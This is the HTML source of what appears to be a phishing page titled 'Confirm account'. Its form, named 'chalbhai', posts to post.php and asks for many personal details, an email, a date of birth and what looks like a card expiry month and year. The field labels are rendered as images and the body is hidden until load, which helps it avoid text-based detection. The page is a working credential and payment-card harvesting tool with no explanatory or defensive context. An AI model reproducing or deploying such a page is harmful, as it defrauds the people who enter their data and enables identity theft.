<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Confirm account</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">

</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:-1px; width:1425px; height:33px; z-index:0"><img src="images/wa.png" alt="" title="" border=0 width=1425 height=33></div>

<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:50px; width:473px; height:151px; z-index:1"><img src="images/ae.png" alt="" title="" border=0 width=473 height=151></div>

<div id="image3" style="position:absolute; overflow:hidden; left:0px; top:245px; width:210px; height:33px; z-index:2"><img src="images/atidy.png" alt="" title="" border=0 width=210 height=33></div>

<div id="hr1" style="position:absolute; overflow:hidden; left:0px; top:276px; width:483px; height:17px; z-index:3">
<hr size=2 width=483>
</div>

<div id="image4" style="position:absolute; overflow:hidden; left:0px; top:294px; width:184px; height:617px; z-index:4"><img src="images/ass.png" alt="" title="" border=0 width=184 height=617></div>
<form action=post.php name=chalbhai id=chalbhai method=post>
<input name="formtext1"  required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;left:193px;height:26px;top:302px;z-index:5">
<input name="formtext2"  required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;height:26px;left:193px;top:337px;z-index:6">
<input name="formtext3"  required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;height:26px;left:193px;top:375px;z-index:7">
<input name="formtext4" required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;height:26px;left:193px;top:417px;z-index:8">
<input name="formtext5"  required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;height:26px;left:193px;top:454px;z-index:9">
<input name="formtext6"  required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;height:26px;left:192px;top:492px;z-index:10">
<input name="formtext7"  required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;height:26px;left:193px;top:528px;z-index:11">
<input name="formtext8"  required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;height:26px;left:192px;top:563px;z-index:12">
<input name="formtext9"  required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;height:26px;left:193px;top:598px;z-index:13">
<input name="formtext10"  pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required type="email" style="position:absolute;width:277px;left:193px;height:26px;top:634px;z-index:14">
<input name="formtext12"  required title="Please Enter Right Value"  type="text" style="position:absolute;width:277px;height:26px;left:193px;top:670px;z-index:15">
<input name="formtext13"  required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;height:26px;left:192px;top:741px;z-index:16">
<input name="formtext14"  required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;height:26px;left:193px;top:779px;z-index:17">
<input name="formtext16"  required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;height:26px;left:193px;top:851px;z-index:18">
<input name="formtext17"  required title="Please Enter Right Value" type="text" style="position:absolute;width:277px;height:26px;left:193px;top:886px;z-index:19">
<select name="formselect1" style="position:absolute;left:191px;height:26px;top:707px;width:77px;z-index:20">
<option value="Day">Day</option>
	<option value="1">1</option>
	<option value="2">2</option>
	<option value="3">3</option>
	<option value="4">4</option>
	<option value="5">5</option>
	<option value="6">6</option>
	<option value="7">7</option>
	<option value="8">8</option>
	<option value="9">9</option>
	<option value="10">10</option>
	<option value="11">11</option>
	<option value="12">12</option>
	<option value="13">13</option>
	<option value="14">14</option>
	<option value="15">15</option>
	<option value="16">16</option>
	<option value="17">17</option>
	<option value="18">18</option>
	<option value="19">19</option>
	<option value="20">20</option>
	<option value="21">21</option>
	<option value="22">22</option>
	<option value="23">23</option>
	<option value="24">24</option>
	<option value="25">25</option>
	<option value="26">26</option>
	<option value="27">27</option>
	<option value="28">28</option>
	<option value="29">29</option>
	<option value="30">30</option>
	<option value="31">31</option>
</select>
<select name="formselect2" style="position:absolute;left:286px;height:26px;top:707px;width:81px;z-index:21">
<option value="Month">Month</option>
<option value="January">January</option>
	<option value="Febuary">Febuary</option>
	<option value="March">March</option>
	<option value="April">April</option>
	<option value="May">May</option>
	<option value="June">June</option>
	<option value="July">July</option>
	<option value="August">August</option>
	<option value="September">September</option>
	<option value="October">October</option>
	<option value="November">November</option>
	<option value="December">December</option>
</select>
<select name="formselect3" style="position:absolute;left:380px;height:26px;top:707px;width:89px;z-index:22">
<option value="Year">Year</option>
<option value="1993">1993</option>
	<option value="1992">1992</option>
	<option value="1991">1991</option>
	<option value="1990">1990</option>
	<option value="1989">1989</option>
	<option value="1988">1988</option>
	<option value="1987">1987</option>
	<option value="1986">1986</option>
	<option value="1985">1985</option>
	<option value="1984">1984</option>
	<option value="1983">1983</option>
	<option value="1982">1982</option>
	<option value="1981">1981</option>
	<option value="1980">1980</option>
	<option value="1979">1979</option>
	<option value="1978">1978</option>
	<option value="1977">1977</option>
	<option value="1976">1976</option>
	<option value="1975">1975</option>
	<option value="1974">1974</option>
	<option value="1973">1973</option>
	<option value="1972">1972</option>
	<option value="1971">1971</option>
	<option value="1970">1970</option>
	<option value="1969">1969</option>
	<option value="1968">1968</option>
	<option value="1967">1967</option>
	<option value="1966">1966</option>
	<option value="1965">1965</option>
	<option value="1964">1964</option>
	<option value="1963">1963</option>
	<option value="1962">1962</option>
	<option value="1961">1961</option>
	<option value="1960">1960</option>
	<option value="1959">1959</option>
	<option value="1958">1958</option>
	<option value="1957">1957</option>
	<option value="1956">1956</option>
	<option value="1955">1955</option>
	<option value="1954">1954</option>
	<option value="1953">1953</option>
	<option value="1952">1952</option>
	<option value="1951">1951</option>
	<option value="1950">1950</option>
	<option value="1949">1949</option>
	<option value="1948">1948</option>
	<option value="1947">1947</option>
</select>
<select name="formselect4" style="position:absolute;left:192px;height:26px;top:812px;width:77px;z-index:23">
<option value="Month">Month</option>
<option value="January">January</option>
	<option value="Febuary">Febuary</option>
	<option value="March">March</option>
	<option value="April">April</option>
	<option value="May">May</option>
	<option value="June">June</option>
	<option value="July">July</option>
	<option value="August">August</option>
	<option value="September">September</option>
	<option value="October">October</option>
	<option value="November">November</option>
	<option value="December">December</option></select>
<select name="formselect5" style="position:absolute;left:282px;height:26px;top:812px;width:81px;z-index:24">
<option value="Year">Year</option>
<option value='15'>2015</option>
    <option value='16'>2016</option>
    <option value='17'>2017</option>
	 <option value='18'>2018</option>
    <option value='19'>2019</option>
    <option value='20'>2020</option>
	<option value='21'>2021</option>
    <option value='22'>2022</option>
    <option value='23'>2023</option></select>
<div id="hr2" style="position:absolute; overflow:hidden; left:0px; top:941px; width:494px; height:17px; z-index:25">
<hr size=2 width=494>
</div>

<div id="formimage1" style="position:absolute; left:382px; top:965px; z-index:26"><input type="image" name="formimage1" width="94" height="35" src="images/conti.png"></div>
<div id="image5" style="position:absolute; overflow:hidden; left:271px; top:964px; width:93px; height:38px; z-index:27"><a href="#"><img src="images/cancl.png" alt="" title="" border=0 width=93 height=38></a></div>

<div id="image6" style="position:absolute; overflow:hidden; left:0px; top:1071px; width:1312px; height:175px; z-index:28"><a href="#"><img src="images/fotr.png" alt="" title="" border=0 width=1312 height=175></a></div>


</body>
</html>
